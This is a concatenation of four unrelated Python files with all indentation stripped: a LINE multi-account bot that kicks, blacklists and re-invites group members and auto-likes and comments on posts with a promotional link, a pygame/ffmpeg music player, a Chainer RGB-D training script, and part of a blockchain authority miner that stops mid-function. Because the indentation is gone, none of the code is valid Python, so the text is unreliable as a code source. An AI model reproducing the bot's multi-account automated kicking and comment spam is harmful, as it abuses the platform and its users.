cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in kimid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
except:
pass
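# op.type 17 presumably signals that someone joined the group: blacklisted joiners are
# kicked again while protection is enabled, and other newcomers get a warning message.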
if op.type == 17:
if op.param2 not in Bots:
if wait["protect"] == True:
if wait["blacklist"].get(op.param2) == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open QR Kick finish-----#
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
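# op.type 55 is logged below as NOTIFIED_READ_MESSAGE: when a read point has been set for
# the chat, the reader's display name is appended to wait2['readMember'] so a later command
# can report who has read the messages.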
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n|| " + Nama
wait2['ROM'][op.param1][op.param2] = "|| " + Nama
wait2['setTime'][op.param1] = datetime.strftime(now2,"%H:%M")
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
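# Background worker: polls the timeline via cl.activity() and auto-likes (and optionally
# comments on) posts that have not been liked yet; it gives up after roughly 50 errors.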
def autolike():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait['likeOn'] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
print "Like"
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread2 = threading.Thread(target=autolike)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Already Liked Om"
time.sleep(0.60)
def likeme():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in mid:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By C-A_Bot😊\n\n☆º°˚˚✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰º°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/~krissthea «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Om"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
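# Background worker: when wait["clock"] is enabled, appends the current time to the display
# name stored in wait["cName"] and refreshes it roughly every 10 minutes.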
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
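# Main long-poll loop: fetch pending operations, advance the stored revision so the same
# operation is not processed twice, and dispatch each one to bot().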
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
music.py
|
import os, time
import pygame
from pygame.locals import *
import ffmpeg
import threading
import datetime
import math
import wave
import mutagen
class MusicCache:
def __init__(self, endevent=None):
self.cache = {}
self.endevent = endevent
def get(self, filename):
if isinstance(filename, list):
_filename = "-".join("%s"%filename)
else:
_filename = filename
if self.cache.get(_filename):
return self.cache.get(_filename)
else:
music = Music(self.endevent)
music.load(filename)
self.cache[_filename] = music
return self.cache.get(_filename)
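# Music streams audio by decoding the file with ffmpeg to raw signed 16-bit PCM over a pipe
# and queueing the chunks onto a pygame mixer channel, which also allows seeking by
# restarting the decode with an -ss offset. A rough usage sketch (the file path and the
# SONG_END event id are illustrative assumptions; pygame.mixer must be initialised first):
#
#   import pygame
#   SONG_END = pygame.USEREVENT + 1
#   Music.init()
#   pygame.mixer.init()
#   cache = MusicCache(endevent=SONG_END)
#   track = cache.get("song.mp3")
#   track.play()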
class Music:
FREQ = 44100
SIZE = 16
CHANNELS = 2
@classmethod
def offset(self, seq = 1):
return seq * self.FREQ * self.SIZE * self.CHANNELS // 8
@classmethod
def seconds(self, ofs):
return float(ofs) / self.offset()
@classmethod
def init(self):
pygame.mixer.pre_init(self.FREQ, self.SIZE, self.CHANNELS, 1024*4)
def __init__(self, endevent=None):
self.buffer = None
self.channel = None
self.sound = None
self.endevent = endevent
self.filename = None
self.thread = None
self.cache = None
self.play_start_time = None
self.paused_at = None
def load(self, filename):
self.filename = filename
# pygame.mixer.music.load(filename)
def play(self, offset_second = 0):
if self.channel:
print("Clear channel")
self.stop()
self.channel = pygame.mixer.find_channel()
if not self.channel or self.channel.get_busy():
print("Error: Channel is busy!")
return False
def play_async(filename, offset_second):
print("Play async")
total_buf = None
self.play_start_time = None
played_offset = 0
ioptions = {}
if offset_second:
ioptions["ss"] = offset_second
pipe = ffmpeg.input(filename, **ioptions).output("pipe:", ac=Music.CHANNELS, f="s16le", acodec="pcm_s16le").run_async(pipe_stdout=True, pipe_stderr=True)
pipe.stderr.close()
try:
while True:
buf = os.read(pipe.stdout.fileno(), Music.offset())
total_buf = buf if not total_buf else total_buf + buf
if len(buf) == 0:
break
if self.channel:
# if queue becomes empty and our buffer has enough length, put it to the channel queue.
if self.channel and not self.channel.get_queue() and len(total_buf) - played_offset > Music.offset():
if not self.play_start_time:
self.play_start_time = datetime.datetime.now()
if offset_second:
self.play_start_time -= datetime.timedelta(seconds = int(offset_second), microseconds = math.fmod(offset_second,1) * 1000 * 1000)
print("started at %s (now=%s)"%(self.play_start_time, datetime.datetime.now()))
self.channel.queue(pygame.mixer.Sound(buffer=total_buf[played_offset:]))
#played_offset = len(total_buf)
total_buf = None
else:
pipe.stdout.close()
except ValueError as e:
print(e)
# Read all media. waitng until queue becomes empty.
# if not offset_second:
# self.cache = total_buf
while self.channel and self.channel.get_queue():
time.sleep(.1)
if self.channel and total_buf:
self.channel.queue(pygame.mixer.Sound(buffer=total_buf[played_offset:]))
# All data is sent to the queue here.
while self.channel and self.channel.get_queue():
time.sleep(.1)
# Last sound chunk is sent to buffer
if self.channel and self.endevent:
self.channel.set_endevent(self.endevent)
if self.cache:
print("Using cache")
self.channel.queue(pygame.mixer.Sound(buffer=self.cache))
if self.channel and self.endevent:
self.channel.set_endevent(self.endevent)
return True
else:
if offset_second:
length = self.length()
if length < offset_second:
return False
self.thread = threading.Thread(target=play_async, args=(self.filename, offset_second))
self.thread.start()
return True
# pygame.mixer.music.set_endevent(SONG_END)
# pygame.mixer.music.play()
def length(self):
if self.filename.endswith(".wav"):
wav = wave.open(self.filename, 'r')
return wav.getnframes() / wav.getframerate()
else:
audio_info = mutagen.File(self.filename)
return audio_info.info.length
def played_offset(self):
if self.play_start_time:
diff = (datetime.datetime.now() if not self.paused_at else self.paused_at) - self.play_start_time
result = diff.seconds + diff.microseconds / float(1000 * 1000)
return result
return 0
def pause(self):
print("Pause")
if self.channel:
self.channel.pause()
self.paused_at = datetime.datetime.now()
def unpause(self):
print("Unpause")
if self.paused_at:
self.channel.unpause()
paused_duration = datetime.datetime.now() - self.paused_at
self.play_start_time += paused_duration
self.paused_at = None
def is_paused(self):
return self.paused_at != None
def seek(self, relative_sec):
current = self.played_offset()
print("Current played time=%f secs"%current)
if current:
start = current + relative_sec
print("Start play at %f sec"%start)
if start < 0:
start = None
return self.play(start)
def stop(self):
if self.channel:
self.clear()
while self.channel.get_sound():
self.channel.get_sound().stop()
self.channel = None
if self.thread:
self.thread.join()
self.thread = None
self.play_start_time = None
# pygame.mixer.music.stop()
def clear(self):
if self.channel:
self.channel.set_endevent()
def rewind(self):
self.stop()
return self.play()
# pygame.mixer.music.rewind()
|
train_mdl.py
|
#!/usr/bin/env python
"""Example code of learning a RGB-D dataset by Multimodal Deep Learning model.
Prerequisite: To run this example, crop the center of ILSVRC2012 training and
validation images and scale them to 256x256, and make two lists of space-
separated CSV whose first column is full path to image and second column is
zero-origin label (this format is same as that used by Caffe's ImageDataLayer).
"""
from __future__ import print_function
import argparse
import datetime
import json
import multiprocessing
import os
import random
import sys
import threading
import time
import numpy as np
from PIL import Image
import six
import six.moves.cPickle as pickle
from six.moves import queue
import chainer
from chainer import computational_graph
from chainer import cuda
from chainer import optimizers
from chainer import serializers
import mdl_full
import mdl_rgb_d
parser = argparse.ArgumentParser(
description='Learning RGB-D dataset by Multimodal Deep Learning Model')
parser.add_argument('train', help='Path to training image-label list file')
parser.add_argument('val', help='Path to validation image-label list file')
parser.add_argument('--mean', '-m', default='mean.npy',
help='Path to the mean file (computed by compute_mean.py)')
'''
parser.add_argument('--arch', '-a', default='nin',
help='Convnet architecture \
(nin, alex, alexbn, googlenet, googlenetbn)')
'''
parser.add_argument('--batchsize', '-B', type=int, default=32,
help='Learning minibatch size')
parser.add_argument('--val_batchsize', '-b', type=int, default=250,
help='Validation minibatch size')
parser.add_argument('--epoch', '-E', default=10, type=int,
help='Number of epochs to learn')
parser.add_argument('--gpu', '-g', default=-1, type=int,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--loaderjob', '-j', default=20, type=int,
help='Number of parallel data loading processes')
parser.add_argument('--root', '-r', default='.',
help='Root directory path of image files')
parser.add_argument('--out', '-o', default='model',
help='Path to save model on each validation')
parser.add_argument('--outstate', '-s', default='state',
help='Path to save optimizer state on each validation')
parser.add_argument('--initmodel', default='',
help='Initialize the model from given file')
parser.add_argument('--resume', default='',
help='Resume the optimization from snapshot')
parser.add_argument('--test', dest='test', action='store_true')
parser.set_defaults(test=False)
args = parser.parse_args()
if args.gpu >= 0:
cuda.check_cuda_available()
xp = cuda.cupy if args.gpu >= 0 else np
assert 50000 % args.val_batchsize == 0
if args.test:
denominator = 1
else:
denominator = 100000
def load_image_list(path, root):
tuples = []
for line in open(path):
pair = line.strip().split()
tuples.append((os.path.join(root, pair[0]), np.int32(pair[1])))
return tuples
# Prepare dataset
train_list = load_image_list(args.train, args.root)
val_list = load_image_list(args.val, args.root)
mean_image = pickle.load(open(args.mean, 'rb'))
# Prepare model
model = mdl_full.MDL_full()
'''
if args.arch == 'nin':
import nin
model = nin.NIN()
elif args.arch == 'alex':
import alex
model = alex.Alex()
elif args.arch == 'alexbn':
import alexbn
model = alexbn.AlexBN()
elif args.arch == 'googlenet':
import googlenet
model = googlenet.GoogLeNet()
elif args.arch == 'googlenetbn':
import googlenetbn
model = googlenetbn.GoogLeNetBN()
else:
raise ValueError('Invalid architecture name')
'''
if args.gpu >= 0:
cuda.get_device(args.gpu).use()
model.to_gpu()
# Setup optimizer
optimizer = optimizers.MomentumSGD(lr=0.01, momentum=0.9)  # TODO: in the literature, lr is reduced to 0.001 after 20K iterations
optimizer.setup(model)
# Init/Resume
if args.initmodel:
print('Load model from', args.initmodel)
serializers.load_npz(args.initmodel, model)
if args.resume:
print('Load optimizer state from', args.resume)
serializers.load_npz(args.resume, optimizer)
# ------------------------------------------------------------------------------
# This example consists of three threads: data feeder, logger and trainer.
# These communicate with each other via Queue.
data_q = queue.Queue(maxsize=1)
res_q = queue.Queue()
cropwidth = 256 - model.insize
def read_image(path, center=False, flip=False):
# Data loading routine
image = np.asarray(Image.open(path)).transpose(2, 0, 1)
if center:
        top = left = cropwidth // 2
else:
top = random.randint(0, cropwidth - 1)
left = random.randint(0, cropwidth - 1)
bottom = model.insize + top
right = model.insize + left
image = image[:, top:bottom, left:right].astype(np.float32)
image -= mean_image[:, top:bottom, left:right]
image /= 255
if flip and random.randint(0, 1) == 0:
return image[:, :, ::-1]
else:
return image
def feed_data():
# Data feeder
i = 0
count = 0
x_batch = np.ndarray(
(args.batchsize, 3, model.insize, model.insize), dtype=np.float32)
y_batch = np.ndarray((args.batchsize,), dtype=np.int32)
val_x_batch = np.ndarray(
(args.val_batchsize, 3, model.insize, model.insize), dtype=np.float32)
val_y_batch = np.ndarray((args.val_batchsize,), dtype=np.int32)
batch_pool = [None] * args.batchsize
val_batch_pool = [None] * args.val_batchsize
pool = multiprocessing.Pool(args.loaderjob)
data_q.put('train')
for epoch in six.moves.range(1, 1 + args.epoch):
print('epoch', epoch, file=sys.stderr)
print('learning rate', optimizer.lr, file=sys.stderr)
perm = np.random.permutation(len(train_list))
for idx in perm:
path, label = train_list[idx]
batch_pool[i] = pool.apply_async(read_image, (path, False, True))
y_batch[i] = label
i += 1
if i == args.batchsize:
for j, x in enumerate(batch_pool):
x_batch[j] = x.get()
data_q.put((x_batch.copy(), y_batch.copy()))
i = 0
count += 1
if count % denominator == 0:
data_q.put('val')
j = 0
for path, label in val_list:
val_batch_pool[j] = pool.apply_async(
read_image, (path, True, False))
val_y_batch[j] = label
j += 1
if j == args.val_batchsize:
for k, x in enumerate(val_batch_pool):
val_x_batch[k] = x.get()
data_q.put((val_x_batch.copy(), val_y_batch.copy()))
j = 0
data_q.put('train')
optimizer.lr *= 0.97
pool.close()
pool.join()
data_q.put('end')
def log_result():
# Logger
train_count = 0
train_cur_loss = 0
train_cur_accuracy = 0
begin_at = time.time()
val_begin_at = None
while True:
result = res_q.get()
if result == 'end':
print(file=sys.stderr)
break
elif result == 'train':
print(file=sys.stderr)
train = True
if val_begin_at is not None:
begin_at += time.time() - val_begin_at
val_begin_at = None
continue
elif result == 'val':
print(file=sys.stderr)
train = False
val_count = val_loss = val_accuracy = 0
val_begin_at = time.time()
continue
loss, accuracy = result
if train:
train_count += 1
duration = time.time() - begin_at
throughput = train_count * args.batchsize / duration
sys.stderr.write(
'\rtrain {} updates ({} samples) time: {} ({} images/sec)'
.format(train_count, train_count * args.batchsize,
datetime.timedelta(seconds=duration), throughput))
train_cur_loss += loss
train_cur_accuracy += accuracy
if train_count % 1000 == 0:
mean_loss = train_cur_loss / 1000
mean_error = 1 - train_cur_accuracy / 1000
print(file=sys.stderr)
print(json.dumps({'type': 'train', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
train_cur_loss = 0
train_cur_accuracy = 0
else:
val_count += args.val_batchsize
duration = time.time() - val_begin_at
throughput = val_count / duration
sys.stderr.write(
'\rval {} batches ({} samples) time: {} ({} images/sec)'
.format(val_count / args.val_batchsize, val_count,
datetime.timedelta(seconds=duration), throughput))
val_loss += loss
val_accuracy += accuracy
if val_count == 50000:
mean_loss = val_loss * args.val_batchsize / 50000
mean_error = 1 - val_accuracy * args.val_batchsize / 50000
print(file=sys.stderr)
print(json.dumps({'type': 'val', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
def train_loop():
# Trainer
graph_generated = False
while True:
while data_q.empty():
time.sleep(0.1)
inp = data_q.get()
if inp == 'end': # quit
res_q.put('end')
break
elif inp == 'train': # restart training
res_q.put('train')
model.train = True
continue
elif inp == 'val': # start validation
res_q.put('val')
serializers.save_npz(args.out, model)
serializers.save_npz(args.outstate, optimizer)
model.train = False
continue
volatile = 'off' if model.train else 'on'
x = chainer.Variable(xp.asarray(inp[0]), volatile=volatile)
t = chainer.Variable(xp.asarray(inp[1]), volatile=volatile)
if model.train:
optimizer.update(model, x, t)
if not graph_generated:
with open('graph.dot', 'w') as o:
o.write(computational_graph.build_computational_graph(
(model.loss,)).dump())
print('generated graph', file=sys.stderr)
graph_generated = True
else:
model(x, t)
res_q.put((float(model.loss.data), float(model.accuracy.data)))
del x, t
# Invoke threads
feeder = threading.Thread(target=feed_data)
feeder.daemon = True
feeder.start()
logger = threading.Thread(target=log_result)
logger.daemon = True
logger.start()
train_loop()
feeder.join()
logger.join()
# Save final model
serializers.save_npz(args.out, model)
serializers.save_npz(args.outstate, optimizer)
|
authority.py
|
import copy
import json
from pprint import pprint
import time
from datetime import datetime
from multiprocessing import Process, Manager
from sys import getsizeof
from typing import List, Optional, Set, Tuple
import requests
import utils.constants as consts
from core import Block, BlockHeader, Chain, Transaction, Utxo
from utils.logger import logger
from utils.utils import compress, dhash, merkle_hash, get_time_difference_from_now_secs
from utils.contract import is_valid_contract_address
from wallet import Wallet
from vjti_chain_relayer import VJTIChainRelayer
from blockchain_vm_interface import BlockchainVMInterface
from authority_rules import authority_rules
def is_my_turn(wallet):
timestamp = datetime.now()
seconds_since_midnight = (timestamp - timestamp.replace(hour=0, minute=0, second=0, microsecond=0)).total_seconds()
for authority in authority_rules["authorities"]:
if seconds_since_midnight <= authority["to"] and seconds_since_midnight >= authority["from"]:
if wallet.public_key == authority["pubkey"]:
return True
return False
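# Illustrative shape of authority_rules as consumed by is_my_turn() above
# (keys follow the usage in the loop; the pubkeys and time windows are placeholders):
#
# authority_rules = {
#     "authorities": [
#         {"pubkey": "<authority-1-public-key>", "from": 0, "to": 43200},      # 00:00-12:00
#         {"pubkey": "<authority-2-public-key>", "from": 43200, "to": 86400},  # 12:00-24:00
#     ]
# }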
class Authority:
def __init__(self):
self.p: Optional[Process] = None
def is_mining(self):
if self.p:
if self.p.is_alive():
return True
else:
self.p = None
return False
def remove_utxo_of_tx(self, tx: Transaction, local_utxo: Utxo) -> Tuple[bool, str]:
for txIn in tx.vin.values():
so = txIn.payout
if so:
if local_utxo.get(so)[0] is not None:
local_utxo.remove(so)
return True, ""
else:
return False, f"Output {so} not in UTXO"
else:
return False, "txIn.payout does not exist"
def start_mining(self, mempool: Set[Transaction], chain: Chain, wallet: Wallet):
if not self.is_mining():
if is_my_turn(wallet):
if len(mempool) > consts.MINING_TRANSACTION_THRESHOLD or (
len(mempool) > 0
and abs(get_time_difference_from_now_secs(chain.header_list[-1].timestamp)) > consts.MINING_INTERVAL_THRESHOLD
):
vjti_chain_relayer = VJTIChainRelayer(wallet)
if not vjti_chain_relayer.chain_is_trusted(chain):
logger.error("Miner: Chain is not trusted")
return
logger.debug("Miner: Chain is trusted")
local_utxo = copy.deepcopy(chain.utxo)
manager = Manager()
mempool_list = manager.list()
def add_contract_tx_to_mempool(transaction) -> bool:
if transaction in mempool_list:
logger.debug(f"Tx {transaction} already exists in mempool")
return True
else:
ok, error_msg = self.remove_utxo_of_tx(transaction, local_utxo)
if ok:
mempool_list.append(transaction)
logger.info(f"Added tx {transaction} to mempool")
return True
else:
logger.error(f"Not adding contract tx {transaction} to mempool: {error_msg}")
return False
interface = BlockchainVMInterface(add_contract_tx_to_mempool)
for tx in [x for x in mempool]:
ok, error_msg = self.remove_utxo_of_tx(tx, local_utxo)
if not ok:
logger.error(f"Removing tx {tx} from mempool: {error_msg}")
mempool.remove(tx)
continue
if tx.contract_code != "":
contract_address = tx.get_contract_address()
if not is_valid_contract_address(contract_address):
logger.error(f"Removed tx {tx} from mempool: tx receiver address is invalid contract address")
mempool.remove(tx)
else:
try:
output = interface.run_contract_code(tx.contract_code, tx.contract_priv_key)
logger.debug(f"Output of contract {contract_address}: {output}")
for txn in mempool:
if txn.get_contract_address() == contract_address:
txn.contract_output = output
break
except Exception as e:
logger.error(f"Error while running code of contact: {contract_address}: {e}")
logger.error(f"Removed tx {tx} from mempool: Error while running contract code")
mempool.remove(tx)
mempool = mempool.union(mempool_list)
self.p = Process(target=self.__mine, args=(mempool, chain, wallet))
self.p.start()
logger.debug("Miner: Started mining")
def stop_mining(self):
if self.is_mining():
# logger.debug("Miner: Called Stop Mining")
self.p.terminate()
self.p = None
def __calculate_transactions(self, transactions: List[Transaction]) -> List[Transaction]:
i = 0
size = 0
mlist = []
